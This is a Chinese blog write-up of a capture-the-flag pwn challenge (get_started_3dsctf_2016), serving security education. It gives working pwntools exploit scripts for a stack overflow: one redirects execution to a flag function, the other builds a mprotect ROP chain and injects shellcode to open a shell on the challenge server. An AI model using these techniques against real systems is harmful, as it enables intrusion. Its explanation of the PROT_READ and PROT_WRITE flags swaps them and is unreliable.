get_started_3dsctf_2016

最新推荐文章于 2024-07-07 17:28:09 发布
最新推荐文章于 2024-07-07 17:28:09 发布
阅读量1.3k 收藏 5
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/111339245
版权

先进入到题目环境里,程序接收用户输入,然后返回一串字符
在这里插入图片描述
checksec查看一下保护,只开启了NX,堆栈不可执行保护
在这里插入图片描述
用IDA分析程序,这一段程序很简短,gets函数存在溢出
在这里插入图片描述
发现了一个名为get_flag的函数
在这里插入图片描述
通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag
思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了
这里可以用本地调试判断偏移量
在这里插入图片描述
在这里插入图片描述
从输入位到覆盖掉ebp的偏移量为56(平时都是直接看ida的偏移,但是有时可能会出问题)
在这里插入图片描述
判断调用这个函数时候的参数,那么我们可以不可以将返回地址溢出成带参数的呢?

答案是可以的,大概就是这么布局:‘a’*offset + ‘ebp’ + get_flag + get_flag的返回地址 + 参数1 + 参数2
C语言有个函数是exit,只要执行这个只要我们把get_flag的返回地址写成exit的地址,程序就可以结束并且有回显了。
在这里插入图片描述

from pwn import *
#q = remote('node3.buuoj.cn',29645)
q = process('./get_started_3dsctf_2016')
context.log_level = 'debug'
sleep(0.1)

payload = 'a'*56
payload += p32(0x080489A0) + p32(0x0804E6A0)
payload += p32(0x308CD64F) + p32(0x195719D1)
q.sendline(payload)
sleep(0.1)
q.recv()

方法二:
在这里插入图片描述

有这么一个函数,mprotect,我们先来学习一下。

int mprotect(const void *start, size_t len, int prot);

第一个参数填的是一个地址,是指需要进行操作的地址。

第二个参数是地址往后多大的长度。

第三个参数的是要赋予的权限。

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

嗯。。。还是上面这一句话讲的明白…

prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:

1)PROT_READ:表示内存段内的内容可写;

2)PROT_WRITE:表示内存段内的内容可读;

3)PROT_EXEC:表示内存段中的内容可执行;

4)PROT_NONE:表示内存段中的内容根本没法访问。

prot=7 是可读可写可执行 #这个是个知识点。。。我是没找到出处,我唯一能想到的就是师傅在调试的过程发现第三个参数等于7是赋给的内存地址权限是可读可写可执行叭。

需要指出的是,指定的内存区间必须包含整个内存页(4K)。区间开始的地址start必须是一个内存页的起始地址,并且区间长度len必须是页大小的整数倍。

就这样,我们就可以将一段地址弄成可以执行的了。因为程序本身也是静态编译,所以地址是不会变的。
  在这里插入图片描述从这里找个地址就可以,我这里取0x80ea00这个地址,大小为0x1000

from pwn import *
q = remote('node3.buuoj.cn',29645)
#q = process('./get_started_3dsctf_2016')
context.log_level = 'debug'

mprotect = 0x0806EC80
buf = 0x80ea000
pop_3_ret = 0x0804f460
read_addr = 0x0806E140

payload = 'a'*56
payload += p32(mprotect)
payload += p32(pop_3_ret)
payload += p32(buf)
payload += p32(0x1000)
payload += p32(0x7)
payload += p32(read_addr)
payload += p32(buf)
payload += p32(0)
payload += p32(buf)
payload += p32(0x100)
q.sendline(payload)
sleep(0.1)

shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
q.sendline(shellcode)
sleep(0.1)
q.interactive()
沫忆末忆
关注
专栏目录
get_started_3dsctf_2016 1
qq_41560595的博客
03-18 779
又是被暴击的一天。 查看文件权限 可以栈溢出,地址写死了。 查看源程序 还是个静态文件,首先想到可以使用Gadget。 分析 存在一个mprotect函数: #include <unistd.h> #include <sys/mmap.h> int mprotect(const void *start, size_t len, int prot); mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot代表着 r-w-x
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 345
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
get_started_3dsctf_2016【BUUCTF】(两种解法)
qq_41696518的博客
08-27 1310
get_started_3dsctf_2016
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1082
mprotect的运用
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 653
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1070
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
【BUUCTF - PWN】get_started_3dsctf_2016
古月浪子的博客
03-25 1553
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 536
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 461
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 361
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
【CTF】get_started_3dsctf_2016
凉水的博客
01-19 626
解题思路: 1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。 undefined4 main(void) { char local_38 [56]; printf("Qual a palavrinha magica? "); gets(local_38); return 0; } 2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。 Arch: i386-32-little RELRO: Partial RELRO Stack:
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 3862
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
【Pwn】get_started_3dsctf_2016
ethan18的博客
07-20 222
这是一个有点难度的题目,反正我是后面去看师傅们的wp了。。。这个题目听大家讲本地的和远程的exp居然还是有差别的首先拿到文件,开始老三样查看主要看在哪个平台:32位还是64位,还有就是有没有canary,如果有的话一般来说都不会是栈溢出攻击的题目然后拖进ida这个可以看出真的是一个栈溢出攻击我们还可以看到get_flag函数看出来是直接进行溢出到第8行地址就行。但是注意,可能是由于这题目远程的时候一些奇妙问题,在我们使用远程的时候没有正常退出会导致出错,无法获取回显。
PHP中curl、fsocket与file_get_content对比分析
尽管cURL的使用相对复杂,需要设置多个选项,但一旦熟悉了这些选项,你会发现它能完成许多file_get_contents无法做到的任务。 例如,使用cURL进行POST请求可以这样做: ```php $ch = curl_init(); curl_setopt($ch...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值